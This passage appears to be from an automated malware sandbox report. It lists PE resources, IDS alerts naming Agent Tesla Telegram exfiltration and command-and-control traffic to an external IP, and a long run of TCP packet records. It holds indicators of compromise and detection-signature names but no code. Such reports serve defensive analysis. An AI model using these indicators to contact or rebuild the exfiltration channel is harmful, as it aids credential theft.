RT_ICON	0x49d00	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2835 x 2835 px/m	0.04588607594936709
RT_ICON	0x5a528	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 2835 x 2835 px/m	0.08384506376948513
RT_GROUP_ICON	0x5e750	0x5a	data	0.7555555555555555
RT_VERSION	0x5e7ac	0x3da	data	0.4117647058823529
RT_MANIFEST	0x5eb88	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-28T18:40:32.827539+0100	2851779	ETPRO MALWARE Agent Tesla Telegram Exfil	1	192.168.2.6	49750	149.154.167.220	443	TCP
2024-11-28T18:40:32.827539+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.6	49750	149.154.167.220	443	TCP
2024-11-28T18:40:32.985769+0100	2854281	ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound	1	149.154.167.220	443	192.168.2.6	49750	TCP
2024-11-28T18:40:35.219398+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.6	49752	149.154.167.220	443	TCP
2024-11-28T18:40:35.374186+0100	2854281	ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound	1	149.154.167.220	443	192.168.2.6	49752	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 28, 2024 18:39:37.535975933 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:37.536022902 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:37.536137104 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:37.560780048 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:37.560798883 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:38.878972054 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:38.879230976 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:38.881870031 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:38.881884098 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:38.882141113 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:38.927041054 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:39.156862020 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:39.199331045 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:39.508276939 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:39.508332014 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:39.508377075 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:39.508419991 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:39.508452892 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:39.508464098 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:39.508487940 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:39.508547068 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:39.511430979 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:39.519903898 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:39.519962072 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:39.519970894 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:39.529086113 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:39.529169083 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:39.529176950 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:39.582887888 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:39.632004023 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:39.676635027 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:39.676647902 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:39.723460913 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:39.723473072 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:39.724395990 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:39.724451065 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:39.724457979 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:39.735680103 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:39.735747099 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:39.735749006 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:39.735760927 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:39.735801935 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:39.743993044 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:39.752382994 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:39.752430916 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:39.752439022 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:39.760930061 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:39.760982990 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:39.760992050 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:39.769061089 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:39.769120932 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:39.769133091 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:39.784173012 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:39.784220934 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:39.784259081 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:39.784271002 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:39.784311056 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:39.790955067 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:39.797840118 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:39.797895908 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:39.797894955 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:39.797910929 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:39.797945976 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:39.804682016 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:39.811620951 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:39.811815023 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:39.811829090 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:39.864109039 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:39.864124060 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:39.911003113 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:39.930680037 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:39.934084892 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:39.934186935 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:39.934206009 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:39.947689056 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:39.947698116 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:39.947778940 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:39.947791100 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:39.961405039 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:39.961508989 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:39.961520910 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:39.961565018 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:39.968323946 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:39.968405962 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:39.981865883 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:39.981878042 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:39.981990099 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:39.992181063 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:39.992201090 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:39.992261887 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:39.992288113 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:39.997361898 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:39.997370005 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:39.997556925 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.007719040 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.007740021 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.007793903 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.007819891 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.017756939 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.017859936 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.023070097 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.023221970 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.033296108 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.033374071 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.043504953 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.043600082 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.048664093 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.048863888 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.058895111 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.058971882 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.066703081 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.066775084 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.141634941 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.141751051 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.143692970 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.143754959 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.153337955 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.153398991 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.162826061 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.162906885 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.167797089 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.167872906 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.177263975 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.177330017 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.186887980 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.186949968 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.190629005 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.190689087 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.197782993 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.197870970 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.203228951 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.203299046 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.207426071 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.207489014 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.209590912 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.209659100 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.213623047 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.213684082 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.215821028 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.215883017 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.220884085 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.220952988 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.223153114 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.223222017 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.227284908 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.227364063 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.231349945 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.231426001 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.235529900 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.235594034 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.237740993 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.237807035 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.241786003 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.241882086 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.244028091 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.244091988 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.248096943 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.248177052 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.252213955 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.252311945 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.262887001 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.263006926 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.264065981 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.264133930 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.355030060 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.355045080 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.355122089 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.355123043 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.355170965 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.355199099 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.368236065 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.368257046 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.368326902 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.368339062 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.381705999 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.381730080 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.381793022 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.381803989 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.391864061 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.391884089 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.391984940 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.391993999 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.392036915 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.399069071 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.399092913 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.399173021 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.399182081 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.399225950 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.405980110 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.405997992 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.406074047 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.406083107 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.406124115 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.413247108 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.413270950 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.413357019 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.413366079 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.413408041 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.420584917 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.420603037 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.420675993 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.420684099 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.420725107 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.564840078 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.564867020 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.564949989 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.564963102 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.565007925 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.571996927 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.572016001 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.572093010 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.572103024 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.572143078 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.578304052 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.578320980 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.578396082 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.578404903 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.578459024 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.585500956 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.585522890 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.585593939 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.585603952 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.585639000 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.592905998 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.592925072 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.593002081 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.593010902 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.593058109 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.599260092 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.599276066 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.599366903 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.599378109 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.599422932 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.606448889 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.606466055 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.606575012 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.606587887 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.606631994 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.612693071 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.612708092 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.612806082 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.612816095 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.612857103 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.775624990 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.775645971 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.775748014 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.775764942 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.775810003 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.781960011 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.781980038 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.782074928 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.782085896 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.782129049 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.789056063 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.789072990 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.789160013 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.789169073 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.789205074 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.796160936 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.796178102 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.796273947 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.796283007 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.796324968 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.803344965 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.803366899 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.803426981 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.803436041 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.803482056 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.810069084 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.810090065 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.810174942 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.810183048 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.810226917 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.816329956 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.816346884 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.816406012 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.816414118 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.816448927 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.823513985 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.823532104 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.823609114 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.823618889 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.823661089 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.986795902 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.986824036 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.986885071 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.986902952 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.986938000 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.986953020 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.993021965 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.993040085 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.993093014 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.993103027 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:40.993125916 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:40.993159056 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.000282049 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.000303030 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.000349045 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.000355959 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.000401020 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.007359028 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.007378101 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.007436991 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.007447004 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.007493019 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.013609886 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.013636112 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.013678074 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.013686895 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.013736010 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.021208048 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.021234989 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.021290064 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.021297932 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.021331072 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.021349907 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.027471066 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.027488947 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.027549028 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.027558088 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.027601004 CET	49710	443	192.168.2.6	172.67.135.55
Nov 28, 2024 18:39:41.034718037 CET	443	49710	172.67.135.55	192.168.2.6
Nov 28, 2024 18:39:41.034734964 CET	443	49710	172.67.135.55	192.168.2.6
